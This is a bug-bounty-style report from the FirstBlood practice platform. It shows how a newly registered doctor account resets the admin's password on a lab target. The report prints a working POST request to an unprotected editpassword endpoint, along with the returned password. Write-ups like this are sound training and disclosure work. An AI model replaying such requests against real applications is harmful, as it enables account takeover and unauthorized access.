FirstBlood-#662It is possible to reset drAdmin's password
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-27, vigilante Level 4 reported:

Summary:

The admin user "drAdmin" is already configured but we don't have the password for it. We can register as a standard user and reset "drAdmin's" password.

When logged in as a normal user, we can see a snippet of code that indicates there's a password reset functionality.

/drpanel/index.php

    /* to do
 function editpassword(username) {
 var xhr = new XMLHttpRequest();
 xhr.open("POST", '', true);
 xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

 xhr.onreadystatechange = function() {
     if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
         alert(this.responseText);
         } else {

         }
     }

 xhr.send();
 } */

To reset the "drAdmin's" password we just need to send a POST request and guess the name of the right endpoint.

Steps to Reproduce:

  1. Register a new Doctors account by using "test" as the unique invite code. This is covered in my previous report id=377.
  2. Navigate to https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/drpanel/index.php and see the snippet of code mentioned earlier.
  3. Open the previous GET request, send it to BURP repeater and modify the following. We're doing this to have auth cookies included in the request.
    • Change request method. This will change GET to POST.
    • Modify the endpoint to /drpanel/drapi/editpassword.php
    • add payload, "username=dradmin&password=dradmin"
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: d8a1eeb46146-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a8100fb5e4101c701b23b66ca
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/login.php?action=login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

username=dradmin&password=dradmin
  1. We've recevied a new password for "drAdmin's" account and verified that we can log in.
    Password updated - RLMzAqTlm8BUG2v

Screenshots:

Impact

A new doctor's account with limited functionality is able to reset true admin's account password.

P1 CRITICAL

Endpoint: drpanel/drapi/editpassword.php This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Auth issues


FirstBlood ID: 24
Vulnerability Type: Auth issues

The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.

FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.